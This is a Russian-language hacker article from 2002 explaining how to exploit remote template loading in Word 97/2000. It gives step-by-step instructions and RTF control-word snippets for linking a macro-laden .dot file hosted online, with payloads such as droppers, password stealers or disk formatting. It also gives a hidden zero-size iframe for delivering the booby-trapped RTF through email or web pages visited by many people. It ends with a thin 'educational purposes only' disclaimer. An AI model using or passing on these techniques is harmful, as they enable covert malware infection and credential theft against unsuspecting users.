Брешь в защите позволяет запускать на машине пользователя макровирусы, а также и любые другие исполняемые файлы будь то троян или вирус.

Данная брешь работает в Microsoft Word 97/2000 в XP не пашет:( закрыли:(

И так к сути дела... Мы создаем шаблон в Word'е 97/2000, создаем там авто макрос, в него записываем в зависимости от Ваших целей начинку, макро вирус или просто дроппер вируса или же команду на форматирования винта;) что угодно:) к примеру, троян Goga используя эту брешь пиздил логины и пароли далее помещаем шаблон в инет на любой сайт.

Cуществуют два способа внедрения:

  1. Создаем rtf-файл, все это делаем в Word97/2000! а не в WordPad'e:) Подключаем к нему шаблон через меню Сервис -> Шаблоны и настройки, -> нажимаем кнопку Присоединить, в появившимся окне обзора файлов, там где меняем диски и папки выбираем Адреса FTP, далее в появившемся окне в строке Имя узла вводим адрес, где лежит шаблон, к сожалению воспринимаются только FTP адреса пример ftp://www.vovan.com/virus.dot а нам нужен допустим http://www.vovan.com/virus.dot вписывать адрес нужно следующим образом ftp://www.vovan.com\virus.dot именно так, далее его можно исправить на http при редактировании rtf-файла обычным Notepad'ом. при присоединении шаблона, необходим OnLine, после присоединения удаленного шаблона сохраняем файл. Далее открываем его в Notepad'е или др. редакторе ищем команду template {\*\template ftp://www.vovan.com/virus.dot} и исправляем, ставим http или ftp, сохраняем, после этого файл готов.
  2. Также можно найти любой rtf-файл созданный в офисе найти в теле файла команду \fet0 и команду \sectd и между ними вставить ссылку на шаблон. Пример: \fet0 {\*\template http://www.vovan.com/virus.dot}\sectd

Условия работы rtf-файла

  1. Файл должен открываться Word97 или Word2000.
  2. OnLine.
  3. Шаблон в инете должен быть не большим, чтобы быстро скачался.

Тут есть свои плюсы и минусы:


+ Легко обновлять.
+ RTF формату многие доверяют.
+ Можно заражать rtf-файлы, просто добавляя в них ссылку на шаблон в инете.
+ Файлы не содержат самого виря.
- Не у всех есть OnLine:(
- Сайт рано или поздно закроют.
- Легко лечить, достаточно найти и убрать ссылку в файле.

Дополнительные иследованния от SBVC

Исходя из того, что при использовании данного метода не показывается никаких предупреждений о запуске макросов мы имеем следующее:

Создаём DOT файл, нашпиговываем его макросами всякими разными, создаём RTF файл со ссылкой на наш DOT в интернете одним из вышеуказанных способов, затем создаём HTMLку, в неё вставляем IFRAME со ссылкой на наш RTF:


 <iframe src=http://yoursite.com/virus.rtf width=0 height=0></iframe>
и всё! Эту HTMLку мы можем рассылать по почте (будет работать только в Outlook'e) или выкладываем на своём порно-сайте, который посещают 1000000 человек в день :) И все, у кого стоят 97 или 2000е Ворды, получат от нас подарок...

Примечание

Данная статья написана лишь в учебных целях, она в очередной раз предостерегает ВАС от бездумного доверия даже таким, казалось бы, безопасным форматам как RTF... и хм, HTML :)

P.S. Если в настройках IE в настройках безопасности будет отключина возможность загрузки файлов, то метод с IFRAME увы не проканает. Но, имхо, у большинства юзеров она включина!

P.P.S. Пример работы дыры можно посмотреть тут - http://sbvc.net/tmp/test.html

21.08.02